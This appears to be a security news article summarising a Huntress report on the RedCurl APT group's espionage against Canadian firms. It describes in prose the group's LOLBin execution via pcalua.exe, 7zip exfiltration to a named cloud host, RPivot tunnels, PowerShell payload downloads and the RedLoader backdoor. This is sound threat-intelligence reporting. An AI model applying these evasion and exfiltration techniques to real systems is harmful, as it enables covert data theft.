The RedCurl Advanced Persistent Threat (APT) group, also known as Earth Kapre or Red Wolf, has resurfaced with a series of cyber espionage campaigns targeting multiple Canadian organizations in late 2023 and 2024, according to a recent report by Huntress. Historically, this group has specialized in stealthy data theft, avoiding tactics like ransomware or monetary extortion. Instead, their focus lies on exfiltrating sensitive information such as corporate emails and confidential files.
RedCurl’s operations exhibit an impressive degree of sophistication, leveraging living-off-the-land binaries (LOLBins) to minimize their footprint. The group’s arsenal includes:
- Use of Pcalua.exe as a LOLBin: This rarely exploited binary was employed to execute malware through scheduled tasks that mimicked legitimate Windows system processes. “The attackers used pcalua.exe to launch the malware via scheduled tasks,” Huntress noted.
- Data Exfiltration with 7zip: RedCurl relied heavily on 7zip for extracting, archiving, and encrypting stolen data before exfiltrating it to cloud storage, such as bora.teracloud[.]jp. This technique also included deleting original files post-exfiltration to reduce detection chances.
- Proxy Tunnels with Python: Utilizing the RPivot tool, the group set up reverse proxy tunnels through Python scripts to establish connections to command-and-control (C2) servers. The Python script used in the command (cl.py) matches the RPivot proxy tool script called client.py.
- PowerShell for Downloads and Execution: RedCurl crafted PowerShell commands to download malware payloads, including temporary files like revtun1.tmp and revtun2.tmp, which were then unarchived and executed.
The group deployed a customized backdoor, dubbed RedLoader, which featured:
- Dynamic DLL resolution: Using encrypted strings decrypted via a rolling XOR routine to resolve sensitive DLLs like bcrypt.dll.
- Scheduled task manipulation: Tasks were camouflaged under names resembling legitimate services, such as SilentCleanup or Usb-Notifications, ensuring persistence while evading detection.
RedCurl APT group’s victims spanned industries such as finance, construction, tourism, and consulting. The group’s recent campaigns primarily targeted Canadian organizations but included broader activity in regions where their tradecraft has been previously observed. Their use of legitimate cloud services for data exfiltration underscores their focus on stealth and operational security.
Huntress aptly concluded, “When a threat actor is motivated by cyberespionage, it drives them to remain undetected for as long as possible.” Their emphasis on blending in with legitimate activity presents a formidable challenge for defenders, necessitating layered defenses and vigilant monitoring.
Related Posts:
- Beware of Search Results: Hackers Using Fake Websites to Spread Malware
- Python Developers Targeted in Massive Supply Chain Attack; Over 170,000 Users Affected
- Hackers use three malware simultaneously in cyber espionage against Ukraine
- North Korean APT’s Stealth Attack on Open-Source Ecosystems
- VPNs and Clouds: New Tools in the APT Arsenal, ESET Warns
